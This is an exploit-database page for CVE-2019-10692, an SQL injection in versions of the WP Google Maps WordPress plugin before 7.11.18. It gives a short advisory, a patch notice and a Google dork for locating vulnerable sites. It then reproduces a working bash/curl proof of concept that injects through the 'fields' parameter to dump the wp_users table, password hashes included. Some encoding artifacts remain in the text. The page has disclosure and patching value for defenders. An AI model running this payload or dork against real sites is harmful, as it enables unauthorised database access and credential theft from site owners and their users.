header-logo
Suggest Exploit
vendor:
WP Google Maps
by:
Jonatas Fil
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: WP Google Maps
Affected Version From: < 7.11.18
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2019-10692
CPE: 2.3:a:wordpress:wp_google_maps:7.11.18
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020

WordPress Rest Google Maps Plugin SQL Injection

A SQL injection vulnerability was discovered in the WordPress Rest Google Maps Plugin. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'rest_route' parameter of the 'index.php' script. An attacker can send a specially crafted HTTP request containing malicious SQL commands to the vulnerable script and execute arbitrary SQL commands on the underlying database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Rest Google Maps Plugin SQL Injection
# Google Dork: inurl:index.php?rest_route=3D/wpgmza/
# Date: 2020-09-09
# Exploit Author: Jonatas Fil
# Vendor Homepage: https://wordpress.org/plugins/wp-google-maps/#developers
# Software Link: https://wordpress.org/plugins/wp-google-maps/
# Version: < 7.11.18
# Tested on: Linux
# CVE : CVE-2019-10692 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCVE-2019-10692)
#!/bin/bash

TARGET="192.168.1.77"

curl -k --silent
"http://$TARGET/index.php?rest_route=3D/wpgmza/v1/markers/&filter=3D%7B%7D&=
fields=3D*+from+wp_users+--+-"
| jq

Navigation

Suggest Exploit

Services By CQR